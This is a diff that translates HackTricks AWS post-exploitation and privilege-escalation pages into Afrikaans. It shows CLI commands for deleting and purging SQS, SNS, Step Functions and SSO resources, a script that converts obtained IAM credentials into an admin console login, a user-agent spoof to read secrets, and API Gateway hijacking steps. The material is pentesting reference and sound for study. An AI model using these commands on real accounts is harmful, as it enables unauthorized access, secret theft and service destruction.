 ```bash
 aws sns publish --topic-arn <value> --message <value>
 ```
-
-**Potential Impact**: Data corruption, unintended actions, or resource exhaustion.
+**Potensiële Impak**: Gegevensbesoedeling, onbedoelde aksies, of hulpbronuitputting.
 
 ### `sns:SetTopicAttributes`
 
-An attacker could modify the attributes of an SNS topic, potentially affecting its performance, security, or availability.
-
+'n Aanvaller kan die eienskappe van 'n SNS-tema wysig, wat moontlik sy prestasie, sekuriteit of beskikbaarheid kan beïnvloed.
 ```bash
 aws sns set-topic-attributes --topic-arn <value> --attribute-name <value> --attribute-value <value>
 ```
-
-**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+**Potensiële Impak**: Misconfigurasies wat lei tot verminderde prestasie, sekuriteitskwessies, of verminderde beskikbaarheid.
 
 ### `sns:Subscribe` , `sns:Unsubscribe`
 
-An attacker could subscribe or unsubscribe to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic.
-
+'n Aanvaller kan op 'n SNS onderwerp inteken of uitskakel, wat moontlik ongeoorloofde toegang tot boodskappe kan verkry of die normale funksionering van toepassings wat op die onderwerp staatmaak, kan ontwrig.
 ```bash
 aws sns subscribe --topic-arn <value> --protocol <value> --endpoint <value>
 aws sns unsubscribe --subscription-arn <value>
 ```
-
-**Potential Impact**: Unauthorized access to messages, service disruption for applications relying on the affected topic.
+**Potensiële Impak**: Onbevoegde toegang tot boodskappe, diensonderbreking vir toepassings wat op die betrokke onderwerp staatmaak.
 
 ### `sns:AddPermission` , `sns:RemovePermission`
 
-An attacker could grant unauthorized users or services access to an SNS topic, or revoke permissions for legitimate users, causing disruptions in the normal functioning of applications that rely on the topic.
-
+'n Aanvaller kan onbevoegde gebruikers of dienste toegang tot 'n SNS-onderwerp verleen, of toestemmings vir wettige gebruikers intrek, wat onderbrekings in die normale funksionering van toepassings wat op die onderwerp staatmaak, veroorsaak.
 ```css
 aws sns add-permission --topic-arn <value> --label <value> --aws-account-id <value> --action-name <value>
 aws sns remove-permission --topic-arn <value> --label <value>
 ```
-
-**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic.
+**Potensiële Impak**: Onbevoegde toegang tot die onderwerp, boodskapblootstelling, of onderwerpmanipulasie deur onbevoegde gebruikers of dienste, onderbreking van normale funksionering vir toepassings wat op die onderwerp staatmaak.
 
 ### `sns:TagResource` , `sns:UntagResource`
 
-An attacker could add, modify, or remove tags from SNS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+'n Aanvaller kan etikette byvoeg, wysig of verwyder van SNS-hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig.
 ```bash
 aws sns tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
 aws sns untag-resource --resource-arn <value> --tag-keys <key>
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potensiële Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
index 872693e89..ea773c009 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SQS
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
@@ -12,80 +12,62 @@ For more information check:
 
 ### `sqs:SendMessage` , `sqs:SendMessageBatch`
 
-An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources.
-
+'n Aanvaller kan kwaadwillige of ongewenste boodskappe na die SQS-ry stuur, wat moontlik datakorruptie kan veroorsaak, onbedoelde aksies kan ontketen, of hulpbronne kan uitput.
 ```bash
 aws sqs send-message --queue-url <value> --message-body <value>
 aws sqs send-message-batch --queue-url <value> --entries <value>
 ```
-
-**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion.
+**Potensiële Impak**: Kwetsbaarheid benutting, Gegevensbesoedeling, onbedoelde aksies, of hulpbronuitputting.
 
 ### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility`
 
-An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages.
-
+'n Aanvaller kan boodskappe in 'n SQS-ry ontvang, verwyder of die sigbaarheid van boodskappe verander, wat kan lei tot boodskapverlies, gegevensbesoedeling, of diensonderbreking vir toepassings wat op daardie boodskappe staatmaak.
 ```bash
 aws sqs receive-message --queue-url <value>
 aws sqs delete-message --queue-url <value> --receipt-handle <value>
 aws sqs change-message-visibility --queue-url <value> --receipt-handle <value> --visibility-timeout <value>
 ```
-
-**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages.
+**Potensiële Impak**: Steal sensitiewe inligting, boodskapverlies, datakorruptie, en diensonderbreking vir toepassings wat op die aangetaste boodskappe staatmaak.
 
 ### `sqs:DeleteQueue`
 
-An attacker could delete an entire SQS queue, causing message loss and impacting applications relying on the queue.
-
+'n Aanvaller kan 'n hele SQS-rye verwyder, wat boodskapverlies veroorsaak en toepassings wat op die ry staatmaak, beïnvloed.
 ```arduino
 Copy codeaws sqs delete-queue --queue-url <value>
 ```
-
-**Potential Impact**: Message loss and service disruption for applications using the deleted queue.
+**Potensiële Impak**: Boodskapverlies en diensonderbreking vir toepassings wat die verwyderde wagte gebruik.
 
 ### `sqs:PurgeQueue`
 
-An attacker could purge all messages from an SQS queue, leading to message loss and potential disruption of applications relying on those messages.
-
+'n Aanvaller kan alle boodskappe uit 'n SQS-wagte verwyder, wat lei tot boodskapverlies en potensiële onderbreking van toepassings wat op daardie boodskappe staatmaak.
 ```arduino
 Copy codeaws sqs purge-queue --queue-url <value>
 ```
-
-**Potential Impact**: Message loss and service disruption for applications relying on the purged messages.
+**Potensiële Impak**: Boodskapverlies en diensonderbreking vir toepassings wat op die verwyderde boodskappe staatmaak.
 
 ### `sqs:SetQueueAttributes`
 
-An attacker could modify the attributes of an SQS queue, potentially affecting its performance, security, or availability.
-
+'n Aanvaller kan die eienskappe van 'n SQS-ry kan verander, wat moontlik die prestasie, sekuriteit of beskikbaarheid daarvan beïnvloed.
 ```arduino
 aws sqs set-queue-attributes --queue-url <value> --attributes <value>
 ```
-
-**Potential Impact**: Misconfigurations leading to degraded performance, security issues, or reduced availability.
+**Potensiële Impak**: Misconfigurasies wat lei tot verminderde prestasie, sekuriteitskwessies, of verminderde beskikbaarheid.
 
 ### `sqs:TagQueue` , `sqs:UntagQueue`
 
-An attacker could add, modify, or remove tags from SQS resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+'n Aanvaller kan etikette byvoeg, wysig of verwyder van SQS-hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig.
 ```bash
 aws sqs tag-queue --queue-url <value> --tags Key=<key>,Value=<value>
 aws sqs untag-queue --queue-url <value> --tag-keys <key>
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potensiële Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide.
 
 ### `sqs:RemovePermission`
 
-An attacker could revoke permissions for legitimate users or services by removing policies associated with the SQS queue. This could lead to disruptions in the normal functioning of applications that rely on the queue.
-
+'n Aanvaller kan toestemming vir wettige gebruikers of dienste herroep deur beleide wat met die SQS-ry gekoppeld is, te verwyder. Dit kan lei tot ontwrichtings in die normale funksionering van toepassings wat op die ry staatmaak.
 ```arduino
 arduinoCopy codeaws sqs remove-permission --queue-url <value> --label <value>
 ```
-
-**Potential Impact**: Disruption of normal functioning for applications relying on the queue due to unauthorized removal of permissions.
+**Potensiële Impak**: Ontwrichting van normale funksionering vir toepassings wat op die waglys staatmaak as gevolg van ongeoorloofde verwydering van toestemmings.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
index 0d636f261..0f24cd247 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## SSO & identitystore
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
@@ -12,8 +12,7 @@ For more information check:
 
 ### `sso:DeletePermissionSet` | `sso:PutPermissionsBoundaryToPermissionSet` | `sso:DeleteAccountAssignment`
 
-These permissions can be used to disrupt permissions:
-
+Hierdie toestemmings kan gebruik word om toestemmings te ontwrig:
 ```bash
 aws sso-admin delete-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
 
@@ -21,9 +20,4 @@ aws sso-admin put-permissions-boundary-to-permission-set --instance-arn <SSOInst
 
 aws sso-admin delete-account-assignment --instance-arn <SSOInstanceARN> --target-id <TargetID> --target-type <TargetType> --permission-set-arn <PermissionSetARN> --principal-type <PrincipalType> --principal-id <PrincipalID>
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
index 6a0cd5ba9..690d9e480 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md
@@ -1,10 +1,10 @@
-# AWS - Step Functions Post Exploitation
+# AWS - Stap Funksies Post Exploitatie
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Step Functions
+## Stap Funksies
 
-For more information about this AWS service, check:
+Vir meer inligting oor hierdie AWS-diens, kyk:
 
 {{#ref}}
 ../aws-services/aws-stepfunctions-enum.md
@@ -12,20 +12,19 @@ For more information about this AWS service, check:
 
 ### `states:RevealSecrets`
 
-This permission allows to **reveal secret data inside an execution**. For it, it's needed to set Inspection level to TRACE and the revealSecrets parameter to true.
+Hierdie toestemming laat toe om **geheime data binne 'n uitvoering te onthul**. Hiervoor is dit nodig om die Inspeksievlak op TRACE te stel en die revealSecrets parameter op true.
 
 <figure><img src="../../../images/image (348).png" alt=""><figcaption></figcaption></figure>
 
 ### `states:DeleteStateMachine`, `states:DeleteStateMachineVersion`, `states:DeleteStateMachineAlias`
 
-An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, result in data loss, and require significant time to recover and restore the affected state machines. In addition, it would allow an attacker to cover the tracks used, disrupt forensic investigations, and potentially cripple operations by removing essential automation processes and state configurations.
+'n Aanvaller met hierdie toestemmings sal in staat wees om staatmasjiene, hul weergawes en aliase permanent te verwyder. Dit kan kritieke werksvloei ontwrig, lei tot dataverlies, en 'n beduidende hoeveelheid tyd vereis om die geraakte staatmasjiene te herstel en te herstel. Boonop sal dit 'n aanvaller in staat stel om die spore wat gebruik is, te verberg, forensiese ondersoeke te ontwrig, en moontlik bedrywighede te verlam deur noodsaaklike outomatiseringsprosesse en staatkonfigurasies te verwyder.
 
 > [!NOTE]
 >
-> - Deleting a state machine you also delete all its associated versions and aliases.
-> - Deleting a state machine alias you do not delete the state machine versions referecing this alias.
-> - It is not possible to delete a state machine version currently referenced by one o more aliases.
-
+> - Deur 'n staatmasjien te verwyder, verwyder jy ook al sy geassosieerde weergawes en aliase.
+> - Deur 'n staatmasjienalias te verwyder, verwyder jy nie die staatmasjienweergawes wat na hierdie alias verwys nie.
+> - Dit is nie moontlik om 'n staatmasjienweergawes te verwyder wat tans deur een of meer aliase verwys word nie.
 ```bash
 # Delete state machine
 aws stepfunctions delete-state-machine --state-machine-arn <value>
@@ -34,45 +33,34 @@ aws stepfunctions delete-state-machine-version --state-machine-version-arn <valu
 # Delete state machine alias
 aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
 ```
-
-- **Potential Impact**: Disruption of critical workflows, data loss, and operational downtime.
+- **Potensiële Impak**: Ontwrichting van kritieke werksvloeie, dataverlies, en operasionele stilstand.
 
 ### `states:UpdateMapRun`
 
-An attacker with this permission would be able to manipulate the Map Run failure configuration and parallel setting, being able to increase or decrease the maximum number of child workflow executions allowed, affecting directly and performance of the service. In addition, an attacker could tamper with the tolerated failure percentage and count, being able to decrease this value to 0 so every time an item fails, the whole map run would fail, affecting directly to the state machine execution and potentially disrupting critical workflows.
-
+'n Aanvaller met hierdie toestemming sou in staat wees om die Map Run mislukking konfigurasie en parallel instelling te manipuleer, en sou in staat wees om die maksimum aantal kind werksvloei uitvoerings toegelaat te verhoog of te verlaag, wat direk die diens se prestasie beïnvloed. Daarbenewens kan 'n aanvaller die toegelate mislukking persentasie en telling manipuleer, en sou in staat wees om hierdie waarde tot 0 te verlaag sodat elke keer as 'n item misluk, die hele kaart loop sou misluk, wat direk die staat masjien uitvoering beïnvloed en potensieel kritieke werksvloeie ontwrig.
 ```bash
 aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
 ```
-
-- **Potential Impact**: Performance degradation, and disruption of critical workflows.
+- **Potensiële Impak**: Prestasiedegenerasie, en ontwrigting van kritieke werksvloei.
 
 ### `states:StopExecution`
 
-An attacker with this permission could be able to stop the execution of any state machine, disrupting ongoing workflows and processes. This could lead to incomplete transactions, halted business operations, and potential data corruption.
+'n Aanvaller met hierdie toestemming kan in staat wees om die uitvoering van enige staatmasjien te stop, wat lopende werksvloei en prosesse ontwrig. Dit kan lei tot onvoltooide transaksies, gestaakte besigheidsbedrywighede, en potensiële datakorruptie.
 
 > [!WARNING]
-> This action is not supported by **express state machines**.
-
+> Hierdie aksie word nie ondersteun deur **express state machines**.
 ```bash
 aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
 ```
-
-- **Potential Impact**: Disruption of ongoing workflows, operational downtime, and potential data corruption.
+- **Potensiële Impak**: Ontwrichting van lopende werksvloei, operasionele stilstand, en potensiële datakorruptie.
 
 ### `states:TagResource`, `states:UntagResource`
 
-An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
-
+'n Aanvaller kan etikette byvoeg, wysig of verwyder van Step Functions hulpbronne, wat jou organisasie se koste-toewysing, hulpbronopsporing, en toegangbeheerbeleide gebaseer op etikette ontwrig.
 ```bash
 aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
 aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 ```
-
-**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
+**Potensiële Impak**: Ontwrichting van koste-toewysing, hulpbronopsporing, en etiket-gebaseerde toegangbeheerbeleide.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
index 3cabd1b71..f7760823e 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md
@@ -4,21 +4,20 @@
 
 ## STS
 
-For more information:
+Vir meer inligting:
 
 {{#ref}}
 ../aws-services/aws-iam-enum.md
 {{#endref}}
 
-### From IAM Creds to Console
+### Van IAM Krediete na Konsol
 
-If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
-Note that the the user/role must have the permission **`sts:GetFederationToken`**.
+As jy daarin geslaag het om 'n paar IAM krediete te verkry, mag jy belangstel om **die webkonsol te benader** met behulp van die volgende gereedskap.\
+Let daarop dat die gebruiker/rol die toestemming **`sts:GetFederationToken`** moet hê.
 
-#### Custom script
-
-The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
+#### Pasgemaakte skrif
 
+Die volgende skrif sal die standaard profiel en 'n standaard AWS ligging (nie gov en nie cn) gebruik om vir jou 'n geskrewe URL te gee wat jy kan gebruik om in die webkonsol aan te meld:
 ```bash
 # Get federated creds (you must indicate a policy or they won't have any perms)
 ## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
@@ -26,8 +25,8 @@ The following script will use the default profile and a default AWS location (no
 output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
 
 if [ $? -ne 0 ]; then
-    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
-    exit $status
+echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
+exit $status
 fi
 
 # Parse the output
@@ -43,10 +42,10 @@ federation_endpoint="https://signin.aws.amazon.com/federation"
 
 # Make the HTTP request to get the sign-in token
 resp=$(curl -s "$federation_endpoint" \
-    --get \
-    --data-urlencode "Action=getSigninToken" \
-    --data-urlencode "SessionDuration=43200" \
-    --data-urlencode "Session=$json_creds"
+--get \
+--data-urlencode "Action=getSigninToken" \
+--data-urlencode "SessionDuration=43200" \
+--data-urlencode "Session=$json_creds"
 )
 signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
 
@@ -55,11 +54,9 @@ signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
 # Give the URL to login
 echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
 ```
-
 #### aws_consoler
 
-You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
-
+Jy kan **'n webkonsolskakel genereer** met [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
 ```bash
 cd /tmp
 python3 -m venv env
@@ -67,27 +64,23 @@ source ./env/bin/activate
 pip install aws-consoler
 aws_consoler [params...] #This will generate a link to login into the console
 ```
-
 > [!WARNING]
-> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
+> Verseker dat die IAM-gebruiker `sts:GetFederationToken` toestemming het, of verskaf 'n rol om aan te neem.
 
 #### aws-vault
 
-[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
-
+[**aws-vault**](https://github.com/99designs/aws-vault) is 'n hulpmiddel om AWS-akkrediteerings veilig te stoor en toegang daartoe te verkry in 'n ontwikkelingsomgewing.
 ```bash
 aws-vault list
 aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
 aws-vault login jonsmith # Open a browser logged as jonsmith
 ```
-
 > [!NOTE]
-> You can also use **aws-vault** to obtain an **browser console session**
+> Jy kan ook **aws-vault** gebruik om 'n **blaaier-konsolesessie** te verkry.
 
-### **Bypass User-Agent restrictions from Python**
-
-If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
+### **Omseil User-Agent beperkings vanaf Python**
 
+As daar 'n **beperking is om sekere aksies uit te voer gebaseer op die gebruikersagent** wat gebruik word (soos om die gebruik van die python boto3 biblioteek te beperk gebaseer op die gebruikersagent), is dit moontlik om die vorige tegniek te gebruik om **verbinding te maak met die webkonsol deur 'n blaaier**, of jy kan direk die **boto3 gebruikersagent** wysig deur:
 ```bash
 # Shared by ex16x41
 # Create a client
@@ -100,9 +93,4 @@ client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda
 # Perform the action
 response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
index fe4f69e25..58bd1165e 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.md
@@ -4,14 +4,10 @@
 
 ## VPN
 
-For more information:
+Vir meer inligting:
 
 {{#ref}}
 ../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
index ba8374b41..b4e45fd6d 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/README.md
@@ -4,16 +4,16 @@
 
 ## AWS Privilege Escalation
 
-The way to escalate your privileges in AWS is to have enough permissions to be able to, somehow, access other roles/users/groups privileges. Chaining escalations until you have admin access over the organization.
+Die manier om jou voorregte in AWS te verhoog, is om genoeg toestemmings te hê om op een of ander manier toegang te verkry tot ander rolle/gebruikers/groepe se voorregte. Kettingverhogings totdat jy admin-toegang oor die organisasie het.
 
 > [!WARNING]
-> AWS has **hundreds** (if not thousands) of **permissions** that an entity can be granted. In this book you can find **all the permissions that I know** that you can abuse to **escalate privileges**, but if you **know some path** not mentioned here, **please share it**.
+> AWS het **honderde** (indien nie duisende nie) **toestemmings** wat aan 'n entiteit toegeken kan word. In hierdie boek kan jy **alle toestemmings wat ek ken** vind wat jy kan misbruik om **voorregte te verhoog**, maar as jy **'n pad weet** wat hier nie genoem word nie, **deel dit asseblief**.
 
 > [!CAUTION]
-> If an IAM policy has `"Effect": "Allow"` and `"NotAction": "Someaction"` indicating a **resource**... that means that the **allowed principal** has **permission to do ANYTHING but that specified action**.\
-> So remember that this is another way to **grant privileged permissions** to a principal.
+> As 'n IAM-beleid `"Effect": "Allow"` en `"NotAction": "Someaction"` het wat 'n **bron** aandui... beteken dit dat die **toegelate prinsiep** **toestemming het om ENIGE DING te doen behalwe daardie spesifieke aksie**.\
+> So onthou dat dit 'n ander manier is om **bevoorregte toestemmings** aan 'n prinsiep toe te ken.
 
-**The pages of this section are ordered by AWS service. In there you will be able to find permissions that will allow you to escalate privileges.**
+**Die bladsye van hierdie afdeling is georden volgens AWS-diens. Daar sal jy toestemmings vind wat jou in staat sal stel om voorregte te verhoog.**
 
 ## Tools
 
@@ -21,7 +21,3 @@ The way to escalate your privileges in AWS is to have enough permissions to be a
 - [Pacu](https://github.com/RhinoSecurityLabs/pacu)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
index 7f7edbc6e..19959dc5e 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.md
@@ -4,7 +4,7 @@
 
 ## Apigateway
 
-For more information check:
+Vir meer inligting, kyk:
 
 {{#ref}}
 ../aws-services/aws-api-gateway-enum.md
@@ -12,44 +12,37 @@ For more information check:
 
 ### `apigateway:POST`
 
-With this permission you can generate API keys of the APIs configured (per region).
-
+Met hierdie toestemming kan jy API-sleutels van die geconfigureerde API's genereer (per streek).
 ```bash
 aws --region <region> apigateway create-api-key
 ```
-
-**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
+**Potensiële Impak:** Jy kan nie privesc met hierdie tegniek nie, maar jy mag toegang tot sensitiewe inligting kry.
 
 ### `apigateway:GET`
 
-With this permission you can get generated API keys of the APIs configured (per region).
-
+Met hierdie toestemming kan jy gegenereerde API-sleutels van die geconfigureerde API's (per streek) kry.
 ```bash
 aws --region <region> apigateway get-api-keys
 aws --region <region> apigateway get-api-key --api-key <key> --include-value
 ```
-
-**Potential Impact:** You cannot privesc with this technique but you might get access to sensitive info.
+**Potensiële Impak:** Jy kan nie privesc met hierdie tegniek nie, maar jy mag toegang tot sensitiewe inligting kry.
 
 ### `apigateway:UpdateRestApiPolicy`, `apigateway:PATCH`
 
-With these permissions it's possible to modify the resource policy of an API to give yourself access to call it and abuse potential access the API gateway might have (like invoking a vulnerable lambda).
-
+Met hierdie toestemmings is dit moontlik om die hulpbronbeleid van 'n API te wysig om jouself toegang te gee om dit aan te roep en die potensiële toegang wat die API-gateway mag hê, te misbruik (soos om 'n kwesbare lambda aan te roep).
 ```bash
 aws apigateway update-rest-api \
-    --rest-api-id api-id \
-    --patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'
+--rest-api-id api-id \
+--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'
 ```
-
-**Potential Impact:** You, usually, won't be able to privesc directly with this technique but you might get access to sensitive info.
+**Potensiële Impak:** Jy sal gewoonlik nie direk met hierdie tegniek kan privesc nie, maar jy mag toegang tot sensitiewe inligting kry.
 
 ### `apigateway:PutIntegration`, `apigateway:CreateDeployment`, `iam:PassRole`
 
 > [!NOTE]
-> Need testing
-
-An attacker with the permissions `apigateway:PutIntegration`, `apigateway:CreateDeployment`, and `iam:PassRole` can **add a new integration to an existing API Gateway REST API with a Lambda function that has an IAM role attached**. The attacker can then **trigger the Lambda function to execute arbitrary code and potentially gain access to the resources associated with the IAM role**.
+> Moet getoets word
 
+'n Aanvaller met die toestemmings `apigateway:PutIntegration`, `apigateway:CreateDeployment`, en `iam:PassRole` kan **'n nuwe integrasie by 'n bestaande API Gateway REST API met 'n Lambda-funksie wat 'n IAM-rol het, voeg**. Die aanvaller kan dan **die Lambda-funksie aktiveer om arbitrêre kode uit te voer en moontlik toegang tot die hulpbronne wat met die IAM-rol geassosieer is, te verkry**.
 ```bash
 API_ID="your-api-id"
 RESOURCE_ID="your-resource-id"
@@ -63,16 +56,14 @@ aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Access to resources associated with the Lambda function's IAM role.
+**Potensiële Impak**: Toegang tot hulpbronne geassosieer met die Lambda-funksie se IAM-rol.
 
 ### `apigateway:UpdateAuthorizer`, `apigateway:CreateDeployment`
 
 > [!NOTE]
-> Need testing
-
-An attacker with the permissions `apigateway:UpdateAuthorizer` and `apigateway:CreateDeployment` can **modify an existing API Gateway authorizer** to bypass security checks or to execute arbitrary code when API requests are made.
+> Nodig om te toets
 
+'n Aanvaller met die regte `apigateway:UpdateAuthorizer` en `apigateway:CreateDeployment` kan **'n bestaande API Gateway-outeur** wysig om sekuriteitskontroles te omseil of om arbitrêre kode uit te voer wanneer API-versoeke gemaak word.
 ```bash
 API_ID="your-api-id"
 AUTHORIZER_ID="your-authorizer-id"
@@ -84,16 +75,14 @@ aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZ
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Bypassing security checks, unauthorized access to API resources.
+**Potensiële Impak**: Omseiling van sekuriteitskontroles, ongeoorloofde toegang tot API-hulpbronne.
 
 ### `apigateway:UpdateVpcLink`
 
 > [!NOTE]
-> Need testing
-
-An attacker with the permission `apigateway:UpdateVpcLink` can **modify an existing VPC Link to point to a different Network Load Balancer, potentially redirecting private API traffic to unauthorized or malicious resources**.
+> Nodig om te toets
 
+'n Aanvaller met die toestemming `apigateway:UpdateVpcLink` kan **'n bestaande VPC-koppeling wysig om na 'n ander Netwerk Laai Balans te verwys, wat moontlik private API-verkeer na ongeoorloofde of kwaadwillige hulpbronne kan herlei**.
 ```bash
 bashCopy codeVPC_LINK_ID="your-vpc-link-id"
 NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"
@@ -101,11 +90,6 @@ NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new
 # Update the VPC Link
 aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"
 ```
-
-**Potential Impact**: Unauthorized access to private API resources, interception or disruption of API traffic.
+**Potensiële Impak**: Onbevoegde toegang tot private API-hulpbronne, onderskepping of onderbreking van API-verkeer.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
index b477dc31f..f4e2282e8 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.md
@@ -7,7 +7,3 @@
 TODO
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
